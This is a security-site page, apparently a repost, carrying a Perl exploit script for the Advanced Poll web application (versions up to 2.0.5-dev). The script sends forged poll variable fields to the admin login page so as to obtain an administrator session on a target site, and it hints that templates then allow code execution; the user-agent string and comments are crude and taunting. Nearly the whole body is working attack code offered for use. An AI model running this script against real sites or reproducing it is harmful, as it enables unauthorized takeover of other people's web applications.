首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Advanced Poll <= 2.0.5-dev Remote Admin Session Generator Exploit 来源：diwou@phucksys.org 作者：diwou 发布时间：2007-02-08   #!/usr/bin/perl -w # Advanced Poll 2.0.0 >= 2.0.5-dev textfile admin session gen. # # # 0day!  KEEP IT PRIVATE  0day! # # date: 30/07/06 # # diwou <diwou@phucksys.org> # # PHCKSEC (c) 2001-2006. # # see templates for code execution ;). use strict; use warnings; use LWP::UserAgent; use MD5; my ($lwp,$agent,$out,$url,$proxy)=(undef,undef,undef,$ARGV[0],$ARGV[1]); my %zday= ( username => 'jakahw4nk4h', 'pollvars[poll_username]' => 'jakahw4nk4h', password => 'fuckoff', 'pollvars[poll_password]' => '' ); $zday{'pollvars[poll_password]'}=&md5($zday{password}); $agent="Hey IDS! i'm gonna fuck your advanced poll right? B===D"; # post method doesnt log it, so doesnt matter. #$agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1"; # # args: url proxy(optional) # # url: http|https://tatget:(port)/phppoll/ # proxy: http|https://hostname:(port)/ # die("RTFC! ;)") unless(@ARGV); # some lwp routines... $lwp=new LWP::UserAgent(); $lwp->agent($agent); $lwp->timeout(10); $lwp->protocols_allowed(['http','https']); $lwp->proxy(['http','https'],$proxy) if(@ARGV>1); $url.="/" if($url!~/\/$/); $url.="admin/index.php"; print "Using proxy ".$proxy."\n" if($proxy); print "Doing some pretty with ".$url."...\n\n"; $out=$lwp->post($url,\%zday)->content(); if($out=~ /index\.php\?session=((.){32})/) { print "well, you are a bigone ;).\n"; print "try: ".$url."?session=".$1."&uid=1\n"; } else { print "don't worry, u can improve me! eh eh eh :D?\n"; } sub md5 { $_=new MD5; $_->add(@_); return unpack("H*",$_->digest()); }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Site-Assistant <= v0990 (paths ·LightRO CMS 1.0 (index.php pro ·阿里巴巴支付宝远程代码执行漏洞 ·LushiNews <= 1.01 (comments.ph ·LushiWarPlaner 1.0 (register.p ·SmartFTP Client 2.0.1002 Remot ·Axigen <= 2.0.0b1 Remote Denia ·FlashFXP 3.4.0 build 1145 Remo ·Axigen <= 2.0.0b1 Remote Denia ·HP Tru64 Alpha OSF1 v5.1 (ps) ·SAP Web Application Server 6.4 ·Oracle 9i/10g DBMS_EXPORT_EXTE   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved